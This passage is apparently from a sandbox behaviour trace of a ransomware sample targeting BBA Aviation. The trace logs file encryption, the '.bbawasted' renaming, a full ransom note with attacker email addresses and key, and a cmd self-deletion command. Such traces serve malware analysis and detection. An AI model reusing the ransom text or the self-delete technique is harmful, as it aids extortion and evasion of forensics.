(lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg") returned 55 [0079.468] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x278) returned 0x5d0700 [0079.468] lstrcpyW (in: lpString1=0x5d076e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0079.468] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0079.468] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0079.469] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0079.469] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0079.469] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.bbawasted_info" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0079.469] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0079.471] SetEndOfFile (hFile=0x120) returned 1 [0079.471] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.471] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0079.471] lstrcpyW (in: lpString1=0x5d076e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0079.471] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.bbawasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg.bbawasted")) returned 1 [0079.472] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.bbawasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0079.472] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0079.550] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0079.551] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5d2c80 | out: pbBuffer=0x5d2c80) returned 1 [0079.551] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0079.551] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0079.552] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0079.552] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0079.561] SetEndOfFile (hFile=0x120) returned 1 [0079.563] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0079.563] CloseHandle (hObject=0x120) returned 1 [0079.564] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0700 | out: hHeap=0x580000) returned 1 [0079.564] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0079.565] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0079.565] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0079.565] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv") returned 53 [0079.565] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x274) returned 0x5d0700 [0079.565] lstrcpyW (in: lpString1=0x5d076a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0079.565] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0079.565] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0079.566] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0079.566] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0079.566] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.bbawasted_info" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0079.567] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0079.568] SetEndOfFile (hFile=0x120) returned 1 [0079.568] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.568] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0079.568] lstrcpyW (in: lpString1=0x5d076a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0079.568] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.bbawasted" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv.bbawasted")) returned 1 [0079.569] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.bbawasted" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0079.569] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0081.506] UnmapViewOfFile (lpBaseAddress=0x1cd0000) returned 1 [0081.763] CloseHandle (hObject=0xfc) returned 1 [0081.763] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x200) returned 0x5d2990 [0081.763] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0081.764] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5d29d8 | out: pbBuffer=0x5d29d8) returned 1 [0081.764] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0081.764] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0081.765] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0081.765] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0081.773] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x403) returned 0x5ba860 [0081.773] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2990 | out: hHeap=0x580000) returned 1 [0081.773] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0081.773] _snwprintf (in: _Dest=0x5c6ff0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]bPxCUMBsaMcKmLT4e+USGjz8RF8DP6thdA7Nf5qnRnVPsgWDEbcmbOuGRwKKO/DV\r\njyXdER1lYvQEdYXENnMPu+fK80wZhxxCwUfBX6pUAPvJOIdMxIk34sQSZmqafcME\r\n4Q+q/7c2tB2cjnCs/sgdXvEMCe0aqR1pgS1K8AcZ3uvgpxuDn/Mxx0gXzB2GDR9P\r\nZ/3FeXFcMg2jze59fcApPLH9Uml3boaBxZw722U44a/8Yr9HS+ZStj3DAiRsqIUr\r\nnHrQtFAJDjM2GQOwhjv5xuYLyVJU8AAA3MI5ZAthmfvC9Bs0gATgr5d+fvnUf4V4\r\nVXgt/E+WiAp13jJpFyr0bAWHHaBYRUSxa0si7ua6X/83hvwOWLjlS8OFY3jxjaDH\r\n/omGOuEOeDCFkn+13yUQ5yuiFrFWOrvMiyJok+jev8VtiMVaEYh7Hcqz8g1+g8Xs\r\npE6xJTM9sYvYG15yP9j4xDRD5LpUSi+d63A6QCBwi+XqEzTI+R3/eJf6ee6O66Ad\r\n+La8jet2YK5p+3KH/MqzKeaOOImKaOCV0G/0gflQMJTGqSE0PPDc45XIipKZbYlq\r\nGZ3+AtNOV/9Uj+WAkS0k8wd5apymp8du/E6QoWShDTjNMVh+Pxlx1QXHohTbJAto\r\nu/V9YE0Ntw/1x0kuoQ9REoiFWidwWoqFqeKahMgy3yw=[end_key]\r\nKEEP IT\r\n") returned 984 [0081.773] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ba860 | out: hHeap=0x580000) returned 1 [0081.773] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x119fef8, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fef8*=0x7b0, lpOverlapped=0x0) returned 1 [0081.773] SetEndOfFile (hFile=0x120) returned 1 [0081.775] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0081.775] CloseHandle (hObject=0x120) returned 1 [0081.777] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0700 | out: hHeap=0x580000) returned 1 [0081.777] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d72a0 | out: hHeap=0x580000) returned 1 [0081.777] WaitForMultipleObjects (nCount=0x2, lpHandles=0x119ff80*=0xec, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 Process: id = "22" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x3f33b000" os_pid = "0xa88" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalServiceAndNoImpersonation" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AppIDSvc" [0xa], "NT SERVICE\\FDResPub" [0xa], "NT SERVICE\\FontCache" [0xe], "NT SERVICE\\Mcx2Svc" [0xa], "NT SERVICE\\QWAVE" [0xa], "NT SERVICE\\SCardSvr" [0xa], "NT SERVICE\\SensrSvc" [0xa], "NT SERVICE\\SSDPSRV" [0xa], "NT SERVICE\\TBS" [0xa], "NT SERVICE\\upnphost" [0xa], "NT SERVICE\\wcncsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0005b3ff" [0xc000000f], "LOCAL" [0x7] Thread: id = 325 os_tid = 0x84c Thread: id = 326 os_tid = 0xa84 Thread: id = 328 os_tid = 0xa5c Thread: id = 329 os_tid = 0x970 Thread: id = 337 os_tid = 0x910 Thread: id = 339 os_tid = 0x9d0 Process: id = "23" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x3ea92000" os_pid = "0x318" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 330 os_tid = 0x704 Thread: id = 331 os_tid = 0x8e0 Thread: id = 332 os_tid = 0x88c Thread: id = 333 os_tid = 0x900 Thread: id = 334 os_tid = 0x8ac Thread: id = 335 os_tid = 0x89c Thread: id = 336 os_tid = 0x87c Process: id = "24" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x3b1db000" os_pid = "0x930" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0x544" cmd_line = "cmd /c choice /t 10 /d y & attrib -h \"C:\\Windows\\SysWOW64\\Pipe.exe\" & del \"C:\\Windows\\SysWOW64\\Pipe.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 340 os_tid = 0x940 [0083.012] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x32fa6c | out: lpSystemTimeAsFileTime=0x32fa6c*(dwLowDateTime=0xd40bcee0, dwHighDateTime=0x1d64ac6)) [0083.012] GetCurrentProcessId () returned 0x930 [0083.012] GetCurrentThreadId () returned 0x940 [0083.012] GetTickCount () returned 0x114e9c3 [0083.012] QueryPerformanceCounter (in: lpPerformanceCount=0x32fa64 | out: lpPerformanceCount=0x32fa64*=20366896210) returned 1 [0083.013] GetModuleHandleA (lpModuleName=0x0) returned 0x4a2d0000 [0083.013] __set_app_type (_Type=0x1) [0083.013] __p__fmode () returned 0x770331f4 [0083.014] __p__commode () returned 0x770331fc [0083.014] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a2f21a6) returned 0x0 [0083.014] __getmainargs (in: _Argc=0x4a2f4238, _Argv=0x4a2f4240, _Env=0x4a2f423c, _DoWildCard=0, _StartInfo=0x4a2f4140 | out: _Argc=0x4a2f4238, _Argv=0x4a2f4240, _Env=0x4a2f423c) returned 0 [0083.014] GetCurrentThreadId () returned 0x940 [0083.015] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x940) returned 0x60 [0083.015] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0083.015] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0083.015] SetThreadUILanguage (LangId=0x0) returned 0x409 [0083.015] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0083.015] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x32f9fc | out: phkResult=0x32f9fc*=0x0) returned 0x2 [0083.016] VirtualQuery (in: lpAddress=0x32fa33, lpBuffer=0x32f9cc, dwLength=0x1c | out: lpBuffer=0x32f9cc*(BaseAddress=0x32f000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0083.016] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x32f9cc, dwLength=0x1c | out: lpBuffer=0x32f9cc*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0083.016] VirtualQuery (in: lpAddress=0x231000, lpBuffer=0x32f9cc, dwLength=0x1c | out: lpBuffer=0x32f9cc*(BaseAddress=0x231000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0083.016] VirtualQuery (in: lpAddress=0x233000, lpBuffer=0x32f9cc, dwLength=0x1c | out: lpBuffer=0x32f9cc*(BaseAddress=0x233000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0083.016] VirtualQuery (in: lpAddress=0x330000, lpBuffer=0x32f9cc, dwLength=0x1c | out: lpBuffer=0x32f9cc*(BaseAddress=0x330000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xa0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0083.016] GetConsoleOutputCP () returned 0x1b5 [0083.016] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a2f4260 | out: lpCPInfo=0x4a2f4260) returned 1 [0083.016] SetConsoleCtrlHandler (HandlerRoutine=0x4a2ee72a, Add=1) returned 1 [0083.016] _get_osfhandle (_FileHandle=1) returned 0x7 [0083.016] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0083.016] _get_osfhandle (_FileHandle=1) returned 0x7 [0083.017] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a2f41ac | out: lpMode=0x4a2f41ac) returned 1 [0083.017] _get_osfhandle (_FileHandle=1) returned 0x7 [0083.017] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0083.017] _get_osfhandle (_FileHandle=0) returned 0x3 [0083.017] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a2f41b0 | out: lpMode=0x4a2f41b0) returned 1 [0083.019] _get_osfhandle (_FileHandle=0) returned 0x3 [0083.019] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x187) returned 1 [0083.019] GetEnvironmentStringsW () returned 0x421f30* [0083.019] GetProcessHeap () returned 0x410000 [0083.019] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xa12) returned 0x422950 [0083.020] FreeEnvironmentStringsW (penv=0x421f30) returned 1 [0083.020] GetProcessHeap () returned 0x410000 [0083.020] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4) returned 0x421610 [0083.020] GetEnvironmentStringsW () returned 0x421f30* [0083.020] GetProcessHeap () returned 0x410000 [0083.020] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xa12) returned 0x423370 [0083.020] FreeEnvironmentStringsW (penv=0x421f30) returned 1 [0083.020] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x32e96c | out: phkResult=0x32e96c*=0x68) returned 0x0 [0083.020] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x32e974, lpData=0x32e978, lpcbData=0x32e970*=0x1000 | out: lpType=0x32e974*=0x0, lpData=0x32e978*=0x0, lpcbData=0x32e970*=0x1000) returned 0x2 [0083.020] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x32e974, lpData=0x32e978, lpcbData=0x32e970*=0x1000 | out: lpType=0x32e974*=0x4, lpData=0x32e978*=0x1, lpcbData=0x32e970*=0x4) returned 0x0 [0083.020] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x32e974, lpData=0x32e978, lpcbData=0x32e970*=0x1000 | out: lpType=0x32e974*=0x0, lpData=0x32e978*=0x1, lpcbData=0x32e970*=0x1000) returned 0x2 [0083.020] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x32e974, lpData=0x32e978, lpcbData=0x32e970*=0x1000 | out: lpType=0x32e974*=0x4, lpData=0x32e978*=0x0, lpcbData=0x32e970*=0x4) returned 0x0 [0083.020] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x32e974, lpData=0x32e978, lpcbData=0x32e970*=0x1000 | out: lpType=0x32e974*=0x4, lpData=0x32e978*=0x40, lpcbData=0x32e970*=0x4) returned 0x0 [0083.020] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x32e974, lpData=0x32e978, lpcbData=0x32e970*=0x1000 | out: lpType=0x32e974*=0x4, lpData=0x32e978*=0x40, lpcbData=0x32e970*=0x4) returned 0x0 [0083.020] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x32e974, lpData=0x32e978, lpcbData=0x32e970*=0x1000 | out: lpType=0x32e974*=0x0, lpData=0x32e978*=0x40, lpcbData=0x32e970*=0x1000) returned 0x2 [0083.021] RegCloseKey (hKey=0x68) returned 0x0 [0083.021] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x32e96c | out: phkResult=0x32e96c*=0x68) returned 0x0 [0083.021] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x32e974, lpData=0x32e978, lpcbData=0x32e970*=0x1000 | out: lpType=0x32e974*=0x0, lpData=0x32e978*=0x40, lpcbData=0x32e970*=0x1000) returned 0x2 [0083.021] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x32e974, lpData=0x32e978, lpcbData=0x32e970*=0x1000 | out: lpType=0x32e974*=0x4, lpData=0x32e978*=0x1, lpcbData=0x32e970*=0x4) returned 0x0 [0083.021] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x32e974, lpData=0x32e978, lpcbData=0x32e970*=0x1000 | out: lpType=0x32e974*=0x0, lpData=0x32e978*=0x1, lpcbData=0x32e970*=0x1000) returned 0x2 [0083.021] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x32e974, lpData=0x32e978, lpcbData=0x32e970*=0x1000 | out: lpType=0x32e974*=0x4, lpData=0x32e978*=0x0, lpcbData=0x32e970*=0x4) returned 0x0 [0083.021] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x32e974, lpData=0x32e978, lpcbData=0x32e970*=0x1000 | out: lpType=0x32e974*=0x4, lpData=0x32e978*=0x9, lpcbData=0x32e970*=0x4) returned 0x0 [0083.021] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x32e974, lpData=0x32e978, lpcbData=0x32e970*=0x1000 | out: lpType=0x32e974*=0x4, lpData=0x32e978*=0x9, lpcbData=0x32e970*=0x4) returned 0x0 [0083.021] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x32e974, lpData=0x32e978, lpcbData=0x32e970*=0x1000 | out: lpType=0x32e974*=0x0, lpData=0x32e978*=0x9, lpcbData=0x32e970*=0x1000) returned 0x2 [0083.021] RegCloseKey (hKey=0x68) returned 0x0 [0083.021] time (in: timer=0x0 | out: timer=0x0) returned 0x5ef459d7 [0083.021] srand (_Seed=0x5ef459d7) [0083.021] GetCommandLineW () returned="cmd /c choice /t 10 /d y & attrib -h \"C:\\Windows\\SysWOW64\\Pipe.exe\" & del \"C:\\Windows\\SysWOW64\\Pipe.exe\"" [0083.021] GetCommandLineW () returned="cmd /c choice /t 10 /d y & attrib -h \"C:\\Windows\\SysWOW64\\Pipe.exe\" & del \"C:\\Windows\\SysWOW64\\Pipe.exe\"" [0083.024] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a2f5260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0083.024] GetProcessHeap () returned 0x410000 [0083.024] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x210) returned 0x423d90 [0083.024] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x423d98, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0083.057] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a300640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;") returned 0x64 [0083.057] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a300640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0083.057] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a300640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0083.057] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0083.057] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0083.057] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0083.057] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0083.057] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0083.057] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0083.058] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0083.058] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0083.058] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0083.058] GetProcessHeap () returned 0x410000 [0083.058] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x422950 | out: hHeap=0x410000) returned 1 [0083.058] GetEnvironmentStringsW () returned 0x421f30* [0083.058] GetProcessHeap () returned 0x410000 [0083.058] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xa2a) returned 0x4249e0 [0083.058] FreeEnvironmentStringsW (penv=0x421f30) returned 1 [0083.058] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a300640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0083.058] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a300640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0083.058] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0083.058] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0083.058] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0083.058] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0083.058] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0083.058] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0083.058] _wcsicmp (_String1="KEYS", 